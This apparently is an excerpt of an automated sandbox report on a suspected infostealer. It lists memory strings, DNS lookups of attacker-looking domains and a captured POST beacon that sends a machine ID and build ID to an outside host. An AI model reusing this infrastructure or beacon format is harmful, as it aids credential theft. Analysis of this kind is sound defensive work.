Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=39cb6e9105874f5520345b5c; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25489Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveTue, 08 Oct 2024 00:45:50 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlKC equals www.youtube.com (Youtube)
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: kasm.zubairgul.com
Source: global traffic DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGIDHJKKJDGCBGCGIJKHost: kasm.zubairgul.comContent-Length: 255Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 30 30 46 35 44 36 35 43 45 31 36 35 30 34 34 35 35 32 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 61 35 62 63 38 62 37 33 65 31 32 34 32 35 61 64 63 33 63 33 39 39 64 61 38 31 33 36 38 39 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 49 44 48 4a 4b 4b 4a 44 47 43 42 47 43 47 49 4a 4b 2d 2d 0d 0a Data Ascii: ------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="hwid"1F00F5D65CE1650445529-a33c7340-61ca------KEGIDHJKKJDGCBGCGIJKContent-Disposition: form-data; name="build_id"4a5bc8b73e12425adc3c399da8136891------KEGIDHJKKJDGCBGCGIJK--
Source: MSBuild.exe, 00000009.00000002.2217098930.0000000000B51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.HIDAEB
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.orgAEB
Source: T2bmenoX1o.exe, 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.hoptoJKFHCAE
Source: MSBuild.exe, 00000001.00000002.2226316788.000000000059C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://cowod.multipart/form-data;
Source: MSBuild.exe, 00000001.00000002.2239224281.0000000020578000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2241622984.00000000264E2000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2251682068.000000003E2AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2246850104.00000000323C1000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: unknown Network traffic detected: HTTP traffic on port 51562 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51363 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51386 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51401 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51307 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51500 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51330 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51468 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51397 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51412 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51511 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51479 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51341 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51423 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51427
Source: unknown Network traffic detected: HTTP traffic on port 51488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51548
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51307
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51428
Source: unknown Network traffic detected: HTTP traffic on port 51465 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51549
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51304
Source: unknown Network traffic detected: HTTP traffic on port 51299 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51425
Source: unknown Network traffic detected: HTTP traffic on port 51442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51546
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51305
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51547
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51429
Source: unknown Network traffic detected: HTTP traffic on port 51327 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51308
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51309
Source: unknown Network traffic detected: HTTP traffic on port 51362 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51420
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51541
Source: unknown Network traffic detected: HTTP traffic on port 51304 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51302
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51423
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51544
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51303
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51424
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51545
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51421
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51542
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51301
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51422
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51543
Source: unknown Network traffic detected: HTTP traffic on port 51545 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51516 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51407 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51317
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51438
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51559
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51318
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51439
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51315
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51436
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51557
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51316
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51437
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51558
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51319
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51430
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51551
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51310
Source: unknown Network traffic detected: HTTP traffic on port 51374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51552
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51550
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51313
Source: unknown Network traffic detected: HTTP traffic on port 51418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51431 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51434
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51555
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51314
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51435
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51556
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51311
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51432
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51553
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51312
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51433
Source: unknown Network traffic detected: HTTP traffic on port 51527 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51554
Source: unknown Network traffic detected: HTTP traffic on port 51316 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51477 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51385 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51534 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51328
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51449
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51329
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51326
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51447
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51327
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51448
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51320
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51441
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51562
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51321
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51442
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51563
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51560
Source: unknown Network traffic detected: HTTP traffic on port 51419 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51440
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51561
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51324
Source: unknown Network traffic detected: HTTP traffic on port 51396 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51445
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51566
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51325
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51446
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51322
Source: unknown Network traffic detected: HTTP traffic on port 51430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51564
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51323
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51444
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51565
Source: unknown Network traffic detected: HTTP traffic on port 51453 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51339
Source: unknown Network traffic detected: HTTP traffic on port 51464 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51489 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51337
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51458
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51338
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51459
Source: unknown Network traffic detected: HTTP traffic on port 51384 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51328 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51452
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51331
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51332
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51453
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51450
Source: unknown Network traffic detected: HTTP traffic on port 51303 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51330
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51451
Source: unknown Network traffic detected: HTTP traffic on port 51504 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51335
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51456
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51336
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51457
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51333
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51454
Source: unknown Network traffic detected: HTTP traffic on port 51546 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51334
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51455
Source: unknown Network traffic detected: HTTP traffic on port 51373 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51460
Source: unknown Network traffic detected: HTTP traffic on port 51339 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51515 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51557 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51505
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51502
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51503
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51508
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51509
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51506
Source: unknown Network traffic detected: HTTP traffic on port 51337 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51507
Source: unknown Network traffic detected: HTTP traffic on port 51503 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51500
Source: unknown Network traffic detected: HTTP traffic on port 51526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51432 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51501
Source: unknown Network traffic detected: HTTP traffic on port 51535 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51395 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51558 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51372 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51455 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51515
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51516
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51513
Source: unknown Network traffic detected: HTTP traffic on port 51305 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51514
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51519
Source: unknown Network traffic detected: HTTP traffic on port 51466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51487 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51517
Source: unknown Network traffic detected: HTTP traffic on port 51361 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51518
Source: unknown Network traffic detected: HTTP traffic on port 51326 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51511
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51512
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51510
Source: unknown Network traffic detected: HTTP traffic on port 51498 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51408 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51421 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51405
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51526
Source: unknown Network traffic detected: HTTP traffic on port 51547 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51406
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51527
Source: unknown Network traffic detected: HTTP traffic on port 51383 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51403
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51524
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51404
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51525
Source: unknown Network traffic detected: HTTP traffic on port 51360 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51409
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51407
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51528
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51408
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51529
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51401
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51522
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51402
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51520
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51400
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51521
Source: unknown Network traffic detected: HTTP traffic on port 51476 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51499 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51409 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51315 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51443 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51514 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51420 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51416
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51537
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51417
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51538
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51414
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51535
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51415
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51536
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51418
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51539
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51419
Source: unknown Network traffic detected: HTTP traffic on port 51338 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51530
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51412
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51533
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51413
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51534
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51410
Source: unknown Network traffic detected: HTTP traffic on port 51525 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51531
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51411
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51532
Source: unknown Network traffic detected: HTTP traffic on port 51454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51394 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51349 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51386
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51387
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51384
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51385
Source: unknown Network traffic detected: HTTP traffic on port 51507 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51388
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51389
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51390
Source: unknown Network traffic detected: HTTP traffic on port 51451 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51393
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51394
Source: unknown Network traffic detected: HTTP traffic on port 51474 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51497 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51391
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51392
Source: unknown Network traffic detected: HTTP traffic on port 51554 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51531 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51313 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51439 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51382 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51462 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51397
Source: unknown Network traffic detected: HTTP traffic on port 51301 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51398
Source: unknown Network traffic detected: HTTP traffic on port 51565 -> 443
